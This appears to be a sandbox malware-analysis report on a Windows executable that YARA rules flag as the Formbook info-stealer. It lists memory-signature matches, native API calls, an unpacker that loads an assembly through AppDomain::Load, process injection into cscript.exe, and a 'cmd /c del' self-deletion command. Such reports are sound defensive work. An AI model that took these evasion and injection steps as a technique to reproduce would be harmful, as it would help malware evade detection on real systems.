          Source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 2_2_0284E6A0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 2_2_0284E690
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 2_2_0284E69B
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 2_2_0284CC5C
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 2_2_00612050
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0040102D
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00401030
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0041B8D3
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0041B8D6
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0041C98B
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0041C343
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00408C8B
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00408C90
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00402D8C
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00402D90
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00402FB0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01072D07
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01071D55
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD20A0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBB090
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010725DD
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB841F
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061002
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBD5E0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD2581
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010720A8
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA0D20
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC4120
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAF900
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01072B28
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC6E30
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106DBD2
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01071FF1
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDEBB0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010722AE
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01072EF7
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00542050
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FD466
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048020A8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0474841F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048028EC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1002
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047620A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0474B090
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04730D20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04754120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048025DD
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473F900
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04802D07
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0474D5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04801D55
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04762581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048022AE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04756E30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04802EF7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04801FF1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04802B28
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FDBD2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476EBB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0016B8D6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0016B8D3
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0016C98B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0016C343
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_00158C90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_00158C8B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_00152D90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_00152D8C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_00152FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0473B150 appears 35 times
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: String function: 00FAB150 appears 35 times
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_004185F0 NtCreateFile,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_004186A0 NtReadFile,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00418720 NtClose,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_004187D0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_004185EB NtCreateFile,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0041871A NtClose,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_004187CA NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FEB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9560 NtWriteFile,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FEAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FEA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FEA770 NtOpenThread,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FEA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047795D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047796D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0477B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047798F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047798A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0477AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047795F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047799D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0477A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0477A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0477A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047797A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_001685F0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_001686A0 NtReadFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_00168720 NtClose,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_001687D0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_001685EB NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0016871A NtClose,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_001687CA NtAllocateVirtualMemory,
          Source: CtTYTpaAKA.exe, 00000002.00000000.286061314.0000000000690000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBinaryArrayTypeEn.exe< vs CtTYTpaAKA.exe
          Source: CtTYTpaAKA.exe, 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTaskNode.dll4 vs CtTYTpaAKA.exe
          Source: CtTYTpaAKA.exe, 00000005.00000002.354095072.00000000005C0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBinaryArrayTypeEn.exe< vs CtTYTpaAKA.exe
          Source: CtTYTpaAKA.exe, 00000005.00000002.354643605.000000000109F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CtTYTpaAKA.exe
          Source: CtTYTpaAKA.exe, 00000005.00000002.355160029.0000000001330000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs CtTYTpaAKA.exe
          Source: CtTYTpaAKA.exeBinary or memory string: OriginalFilenameBinaryArrayTypeEn.exe< vs CtTYTpaAKA.exe
          Source: CtTYTpaAKA.exeVirustotal: Detection: 13%
          Source: CtTYTpaAKA.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\CtTYTpaAKA.exe 'C:\Users\user\Desktop\CtTYTpaAKA.exe'
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess created: C:\Users\user\Desktop\CtTYTpaAKA.exe C:\Users\user\Desktop\CtTYTpaAKA.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\CtTYTpaAKA.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess created: C:\Users\user\Desktop\CtTYTpaAKA.exe C:\Users\user\Desktop\CtTYTpaAKA.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\CtTYTpaAKA.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CtTYTpaAKA.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@12/9
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: CtTYTpaAKA.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4816:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: CtTYTpaAKA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: CtTYTpaAKA.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cscript.pdbUGP source: CtTYTpaAKA.exe, 00000005.00000002.355160029.0000000001330000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: CtTYTpaAKA.exe, 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, cscript.exe, 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: CtTYTpaAKA.exe, cscript.exe
          Source: Binary string: cscript.pdb source: CtTYTpaAKA.exe, 00000005.00000002.355160029.0000000001330000.00000040.00020000.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: CtTYTpaAKA.exe, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 2.0.CtTYTpaAKA.exe.610000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 2.2.CtTYTpaAKA.exe.610000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.2.CtTYTpaAKA.exe.540000.1.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.CtTYTpaAKA.exe.540000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.CtTYTpaAKA.exe.540000.3.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.CtTYTpaAKA.exe.540000.2.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.CtTYTpaAKA.exe.540000.9.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.CtTYTpaAKA.exe.540000.5.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.CtTYTpaAKA.exe.540000.1.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.CtTYTpaAKA.exe.540000.7.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0041B832 push eax; ret
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0041B83B push eax; ret
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0041B89C push eax; ret
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0041B7E5 push eax; ret
